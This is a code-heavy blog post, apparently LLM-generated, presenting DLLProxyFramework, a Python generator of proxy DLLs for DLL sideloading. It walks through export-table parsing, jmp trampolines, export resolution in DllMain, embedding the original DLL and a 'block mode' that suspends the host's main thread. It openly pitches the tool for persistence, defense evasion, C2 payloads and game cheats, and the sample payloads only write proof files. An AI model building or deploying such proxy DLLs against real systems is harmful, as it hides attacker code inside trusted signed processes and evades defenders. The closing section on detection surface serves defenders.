DLL Proxy Loading: Hijacking Legitimate DLLs for Code Execution
This post covers DLLProxyFramework, a Python tool that takes a target DLL, analyzes its PE export table, and generates a complete Visual Studio or MinGW project that compiles into a proxy DLL. The proxy mirrors every export of the original, forwarding calls through assembly trampolines while executing an arbitrary payload in a separate thread. The technique is known as DLL sideloading (or DLL proxying) and is commonly used for persistence, defense evasion, and game hacking.
What DLL Sideloading Achieves
When a Windows process loads a DLL, the loader searches a well-defined sequence of directories [1]. If an attacker can place a DLL with the right name earlier in that search order, the process loads the attacker’s DLL instead of the legitimate one. This is DLL search order hijacking [2].
The problem with a naive replacement is that the host process expects the DLL to export specific functions. If those exports are missing, the process crashes or fails to start. A proxy DLL solves this by forwarding every export to the real DLL while also running attacker code. The host process calls GetFileVersionInfoA, the proxy’s trampoline jumps to the real GetFileVersionInfoA in the original DLL, and the call completes normally. Meanwhile, a payload thread runs in the background.
From the perspective of a defender reviewing process logs, the running executable is a legitimate, signed binary. The proxy DLL is just a library it was going to load anyway. This is what makes sideloading attractive for both red team operations and game cheating: the payload executes inside a trusted process. For a different approach to getting code into a target process (kernel APC injection from ring 0), see the Peregrine kernel APC injection post.
The Four-Stage Pipeline
The framework is structured as four modules that run sequentially: PE analysis, code generation, resource embedding, and build output. The entry point in generate.py orchestrates them:
# From: generate.py
from analyzer import PEAnalyzer
from generator import CodeGenerator
from embedder import ResourceEmbedder
# ...
analyzer = PEAnalyzer()
export_table = analyzer.analyze(dll_path)
generator = CodeGenerator()
files = generator.generate(
export_table,
embed_enabled=args.embed,
payload_enabled=args.payload,
block_enabled=args.block,
compiler=args.compiler,
original_dll_filename=original_dll_filename,
original_dll_path=original_dll_path,
)
A single command produces all the files needed for compilation:
python generate.py C:\Windows\System32\version.dll --payload --embed --block
The output is a self-contained project directory with C source, assembly trampolines, a module definition file, build scripts, and optionally the original DLL embedded as a PE resource.
Parsing the PE Export Table with pefile
The PEAnalyzer class uses the pefile library to extract the export directory from the target DLL. Each export becomes an ExportEntry dataclass that captures the ordinal, name (if any), forwarding target (if any), and a sanitized identifier safe for use in C and assembly source:
# From: analyzer/pe_analyzer.py
@dataclass
class ExportEntry:
ordinal: int
name: str | None
safe_name: str
forwarder: str | None = None
forwarder_dll: str | None = None
forwarder_func: str | None = None
@property
def is_named(self) -> bool:
return self.name is not None
@property
def is_forwarded(self) -> bool:
return self.forwarder is not None
@property
def is_ordinal_only(self) -> bool:
return self.name is None
The analyzer handles four categories of exports that appear in real Windows DLLs:
- Named exports: The common case. The export has a string name like
GetFileVersionInfoA. - Ordinal-only exports: No name, just a number. Resolved via
GetProcAddress(hModule, MAKEINTRESOURCE(ordinal))[3]. - Forwarded exports: The PE export table points to another DLL rather than containing code. For example,
kernel32.dllforwards many exports tontdll.dll[4]. - C++ mangled names: Exports like
?Initialize@CFactory@@QEAAJXZcontain characters that are illegal in C identifiers.
The name sanitization handles all of these by replacing special characters with safe alternatives:
# From: analyzer/pe_analyzer.py
_REPLACEMENTS = {
'?': '_Q', '@': '_A', '$': '_D', '<': '_L', '>': '_G',
',': '_C', ' ': '_S', '-': '_H', ':': '_K', '~': '_T',
'(': '_OP', ')': '_CP', '[': '_OB', ']': '_CB',
'{': '_OC', '}': '_CC', '=': '_EQ', '+': '_P',
'&': '_R', '*': '_X', '!': '_N', '#': '_SH',
}
def sanitize_identifier(name: str) -> str:
result = name
for old, new in _REPLACEMENTS.items():
result = result.replace(old, new)
result = re.sub(r'[^a-zA-Z0-9_]', '_', result)
if result and result[0].isdigit():
result = '_' + result
return result
This produces identifiers like _QInitialize_ACFactory_A_AQEAAJXZ for the mangled C++ name above. Ugly, but guaranteed to be valid in both C source and assembly labels.
The .def file uses a quoting mechanism for the original names so the linker maps them correctly even when they contain special characters:
# From: generator/template_engine.py
@staticmethod
def _quote_def(name: str) -> str:
if any(c in name for c in '?@$ <>{}()!#~+-=&*,'):
return f'"{name}"'
return name
Assembly Trampolines: One jmp Per Export
The core of the proxy mechanism is the trampoline. For each export, the generator produces an assembly procedure that does exactly one thing: jump through a function pointer. The function pointer is initialized at load time to point to the corresponding function in the real DLL.
For x64 MASM (Visual Studio’s assembler):
; From: generator/templates/trampoline_msvc_x64.asm.j2
.data
EXTERN fp_GetFileVersionInfoA:QWORD
.code
proxy_GetFileVersionInfoA PROC
jmp QWORD PTR [fp_GetFileVersionInfoA]
proxy_GetFileVersionInfoA ENDP
For x86, the same pattern with 32-bit pointers and the _ prefix required by the C calling convention on 32-bit Windows:
; From: generator/templates/trampoline_msvc_x86.asm.j2
.model flat
.data
EXTERN _fp_GetFileVersionInfoA:DWORD
.code
_proxy_GetFileVersionInfoA PROC
jmp DWORD PTR [_fp_GetFileVersionInfoA]
_proxy_GetFileVersionInfoA ENDP
The GCC/MinGW variant uses GAS syntax with Intel mode:
/* From: generator/templates/trampoline_gcc_x64.S.j2 */
.intel_syntax noprefix
.text
.global proxy_GetFileVersionInfoA
proxy_GetFileVersionInfoA:
jmp QWORD PTR [rip + fp_GetFileVersionInfoA]
The jmp through a memory operand is critical. It does not push a return address, does not modify the stack, and does not clobber any registers. The caller’s arguments, return address, and register state pass through untouched. From the caller’s perspective, the trampoline is invisible. This is the same mechanism that import address table (IAT) entries use internally [5]. For a deeper look at how hooking frameworks intercept exactly these kinds of jumps, see the MinHook API interception post.
The .def file (module definition) maps the original export names back to the trampoline labels:
; From: generator/templates/exports.def.j2
LIBRARY "version"
EXPORTS
GetFileVersionInfoA = proxy_GetFileVersionInfoA @1
GetFileVersionInfoSizeA = proxy_GetFileVersionInfoSizeA @3
For ordinal-only exports, the NONAME keyword tells the linker to export by ordinal without a name string:
proxy_ordinal_42 @42 NONAME
Resolving Function Pointers at DLL_PROCESS_ATTACH
When the host process loads the proxy DLL, DllMain receives DLL_PROCESS_ATTACH. The proxy loads the original DLL (either from an embedded resource or from disk) and resolves every function pointer:
// From: generator/templates/proxy.c.j2
/* --- Function pointer table --- */
FARPROC fp_GetFileVersionInfoA = NULL;
FARPROC fp_GetFileVersionInfoSizeA = NULL;
// ... one per export
/* --- Resolve all exports from the original DLL --- */
void resolve_exports(HMODULE hOriginal) {
fp_GetFileVersionInfoA = GetProcAddress(hOriginal, "GetFileVersionInfoA");
fp_GetFileVersionInfoSizeA = GetProcAddress(hOriginal, "GetFileVersionInfoSizeA");
// ...
}
For ordinal-only exports, resolution uses the ordinal number directly:
// From: generator/templates/proxy.c.j2
fp_ordinal_42 = GetProcAddress(hOriginal, (LPCSTR)MAKEINTRESOURCE(42));
GetProcAddress is the standard Windows API for resolving exported functions by name or ordinal [3]. Every function pointer starts as NULL and is populated before any trampoline can be called. Since DllMain with DLL_PROCESS_ATTACH runs while the loader lock is held [6], no other thread in the process can call any of these exports until initialization completes.
Embedding the Original DLL as a PE Resource
In non-embed mode, the original DLL must be placed alongside the proxy with a renamed filename (e.g., original_version.dll). This means deploying two files. The --embed flag eliminates that requirement by baking the original DLL into the proxy as a binary PE resource.
The resource definition is straightforward:
// From: generator/templates/resource.rc.j2
#include "resource.h"
IDR_ORIGINAL_DLL BINARY "original_version.dll"
// From: generator/templates/resource.h.j2
#define IDR_ORIGINAL_DLL 101
At load time, the proxy extracts the resource to a temporary directory and loads it:
// From: generator/templates/proxy.c.j2
static BOOL load_embedded_dll(void) {
HRSRC hRes = FindResourceA(hSelf, MAKEINTRESOURCEA(IDR_ORIGINAL_DLL), "BINARY");
if (!hRes) return FALSE;
HGLOBAL hGlobal = LoadResource(hSelf, hRes);
if (!hGlobal) return FALSE;
LPVOID pData = LockResource(hGlobal);
DWORD dwSize = SizeofResource(hSelf, hRes);
if (!pData || dwSize == 0) return FALSE;
char szTempDir[MAX_PATH];
GetTempPathA(MAX_PATH, szTempDir);
lstrcatA(szTempDir, "proxy_fw\\");
CreateDirectoryA(szTempDir, NULL);
lstrcpyA(szTempPath, szTempDir);
lstrcatA(szTempPath, "original_version.dll");
HANDLE hFile = CreateFileA(szTempPath, GENERIC_WRITE, 0, NULL,
CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) return FALSE;
DWORD dwWritten;
WriteFile(hFile, pData, dwSize, &dwWritten, NULL);
CloseHandle(hFile);
if (dwWritten != dwSize) return FALSE;
hOriginalDll = LoadLibraryA(szTempPath);
return hOriginalDll != NULL;
}
The FindResource / LoadResource / LockResource sequence is the standard Windows API pattern for reading embedded resources [7]. The extracted DLL goes to %TEMP%\proxy_fw\ and is cleaned up in the DLL_PROCESS_DETACH handler. This reduces the deployment to a single file: just the proxy DLL, placed next to the target executable.
Block Mode: Keeping the Process Alive
Some host processes exit immediately after loading their DLLs. A command-line tool that prints --help and exits, for instance, will terminate before a payload thread can finish its work. The --block flag addresses this with a two-layer approach.
Primary path: The payload wrapper thread suspends the main thread before it can reach ExitProcess. Once the payload completes, it calls ExitProcess(0) itself:
// From: generator/templates/proxy.c.j2
static DWORD WINAPI payload_wrapper(LPVOID lpParam) {
if (hMainThread) {
SuspendThread(hMainThread);
}
payload_main(lpParam);
SetEvent(hPayloadDone);
ExitProcess(0);
return 0;
}
Fallback path: If the main thread wins the race and reaches atexit before the wrapper can suspend it, a registered atexit handler blocks until the payload signals completion:
// From: generator/templates/proxy.c.j2
static void wait_for_payload(void) {
if (hPayloadDone) {
WaitForSingleObject(hPayloadDone, INFINITE);
}
}
The atexit handler is registered during DLL_PROCESS_ATTACH:
// From: generator/templates/proxy.c.j2
case DLL_PROCESS_ATTACH:
hSelf = hinstDLL;
DisableThreadLibraryCalls(hinstDLL);
init_proxy();
atexit(wait_for_payload);
break;
The main thread handle is obtained via DuplicateHandle with THREAD_SUSPEND_RESUME access, not by opening it externally. This avoids any cross-process handle operations. Both paths are deadlock-free: the suspend happens after loader lock is released (the wrapper runs in its own thread, which is created during DLL_PROCESS_ATTACH but does not execute until the loader lock is released), and the atexit handler only waits on an event, not on any lock.
The Payload Slot
When --payload is specified, the generator produces a payload.c template:
// From: generator/templates/payload.c.j2
DWORD WINAPI payload_main(LPVOID lpParam) {
(void)lpParam;
/* --- YOUR CODE HERE --- */
OutputDebugStringA("[DLL Proxy] Payload thread started\n");
OutputDebugStringA("[DLL Proxy] Payload thread finished\n");
return 0;
}
This function runs in a separate thread after all exports are resolved and forwarding is active. The host process continues to function normally while the payload executes. The payload can do anything: load a DLL reflectively, connect to a C2 server, hook game functions, or call out to statically linked code.
Statically Linking a Rust Payload
The repository includes an example of linking a Rust static library into the proxy. The Rust crate is configured as a staticlib:
# From: test/rust_cheat/Cargo.toml
[package]
name = "rust_cheat"
version = "0.1.0"
edition = "2024"
[lib]
crate-type = ["staticlib"]
The entry point uses C linkage:
// From: test/rust_cheat/src/lib.rs
use std::fs;
use std::io::Write;
#[unsafe(no_mangle)]
pub extern "C" fn cheat_main() {
let pid = std::process::id();
let msg = format!(
"Rust cheat running!\nPID: {}\nThis code is executing inside the hijacked process.\n",
pid
);
if let Ok(mut f) = fs::File::create("rust_proof.txt") {
let _ = f.write_all(msg.as_bytes());
}
}
The payload.c file calls the Rust function via an extern declaration, and the Rust .lib is added to the linker command. The result is a single DLL file containing the proxy export table, the embedded original DLL, and the entire Rust payload, all statically linked. No additional files need to be dropped to disk.
Jinja2 Template Engine and Code Generation
All generated source files come from Jinja2 templates in generator/templates/. The TemplateEngine class loads them and provides two custom filters: sanitize (for identifier sanitization) and quote_def (for .def file quoting):
# From: generator/template_engine.py
class TemplateEngine:
def __init__(self):
self.env = Environment(
loader=FileSystemLoader(str(TEMPLATES_DIR)),
trim_blocks=True,
lstrip_blocks=True,
keep_trailing_newline=True,
)
self.env.filters['sanitize'] = sanitize_identifier
self.env.filters['quote_def'] = self._quote_def
The CodeGenerator class decides which templates to render based on the flags:
# From: generator/codegen.py
files['proxy.c'] = self.engine.render('proxy.c.j2', ctx)
files['proxy.h'] = self.engine.render('proxy.h.j2', ctx)
files['exports.def'] = self.engine.render('exports.def.j2', ctx)
if compiler in ('msvc', 'both'):
if export_table.is_64bit:
files['trampolines.asm'] = self.engine.render('trampoline_msvc_x64.asm.j2', ctx)
else:
files['trampolines.asm'] = self.engine.render('trampoline_msvc_x86.asm.j2', ctx)
files['build_msvc.bat'] = self.engine.render('build_msvc.bat.j2', ctx)
if compiler in ('gcc', 'both'):
if export_table.is_64bit:
files['trampolines.S'] = self.engine.render('trampoline_gcc_x64.S.j2', ctx)
else:
files['trampolines.S'] = self.engine.render('trampoline_gcc_x86.S.j2', ctx)
files['Makefile'] = self.engine.render('Makefile.j2', ctx)
This produces 10-12 files depending on options: always proxy.c, proxy.h, exports.def; per-compiler trampoline and build files; optionally payload.c, payload.h, resource.rc, and resource.h. The template approach means adding support for a new compiler or architecture requires only a new .j2 file and an if branch in the generator.
Test Suite: Eight Combinations of Compiler and Mode
The test/ directory contains a batch script that exercises all mode combinations against version.dll for both MSVC and MinGW. Each test generates a proxy, builds it, and runs a test host that loads the proxy and calls GetFileVersionInfoSizeA:
// From: test/test_host.c
int main(void) {
printf("[host] Loading version.dll...\n");
HMODULE hVer = LoadLibraryA("version.dll");
if (!hVer) {
printf("[host] FAIL: LoadLibrary returned NULL (error %lu)\n", GetLastError());
return 1;
}
pfnGetFileVersionInfoSizeA pSize =
(pfnGetFileVersionInfoSizeA)GetProcAddress(hVer, "GetFileVersionInfoSizeA");
if (pSize) {
DWORD dwHandle = 0;
DWORD size = pSize("C:\\Windows\\System32\\kernel32.dll", &dwHandle);
printf("[host] GetFileVersionInfoSizeA(kernel32.dll) = %lu\n", size);
}
// ...
}
For block mode tests, the payload writes a proof.txt file. The test checks for its existence after the host exits:
// From: test/test_payload_block.c
DWORD WINAPI payload_main(LPVOID lpParam) {
(void)lpParam;
FILE *f = fopen("proof.txt", "w");
if (f) { fprintf(f, "ok"); fclose(f); }
return 0;
}
The test matrix covers 8 combinations: 4 mode permutations (embed/no-embed crossed with block/no-block) for each of the 2 compilers (MSVC and GCC). This verifies that export forwarding, resource extraction, and process blocking all work correctly across both toolchains.
Limitations and Detection Surface
Temp directory artifact. In embed mode, the original DLL is extracted to %TEMP%\proxy_fw\. Any file system monitor or EDR agent watching temp directories for DLL drops will flag this. The cleanup in DLL_PROCESS_DETACH deletes the file, but if the process crashes, the extracted DLL persists. Comment from the human: “I left this IOC in the framework intentionally to make life harder for script kiddies. Anyone with a bit of knowledge can change or remove it.”
No signature on the proxy DLL. The host executable may be signed, but the proxy DLL is not. Defenders checking DLL signatures or Authenticode status will immediately see the discrepancy [8]. Some applications also verify the integrity of their own loaded modules.
Static function pointer table. All function pointers are global FARPROC variables initialized once at load time. This is correct and efficient, but a memory scanner looking for patterns of jmp QWORD PTR [rip + ...] in non-system DLLs could identify the proxy. The trampolines are structurally identical to IAT thunks, which provides some natural camouflage.
No loader lock awareness in the payload. The payload thread is created during DLL_PROCESS_ATTACH, but it does not execute until the loader lock is released. This is fine for the common case, but if the payload itself tries to call LoadLibrary from within DllMain of a dependency, it could deadlock [6]. The framework documents that the payload runs after loader lock release, which is correct for the wrapper thread model.
ANSI-only paths. The temp path extraction and DLL loading use *A (ANSI) variants of the Windows API. This will fail on systems where the temp path contains characters outside the active code page. Using the *W (wide) variants would be more robust.
This post was generated by an LLM based on code from DLLProxyFramework. All code snippets are from the actual repository.
References
[1] Microsoft, “Dynamic-Link Library Search Order”, learn.microsoft.com
[2] MITRE ATT&CK, “T1574.001: Hijack Execution Flow: DLL Search Order Hijacking”, attack.mitre.org
[3] Microsoft, “GetProcAddress function”, learn.microsoft.com
[4] Microsoft, “PE Format: Export Directory Table”, learn.microsoft.com
[5] Microsoft, “PE Format: Import Address Table”, learn.microsoft.com
[6] Microsoft, “DllMain entry point: Remarks”, learn.microsoft.com
[7] Microsoft, “FindResource function”, learn.microsoft.com
[8] Microsoft, “Authenticode”, learn.microsoft.com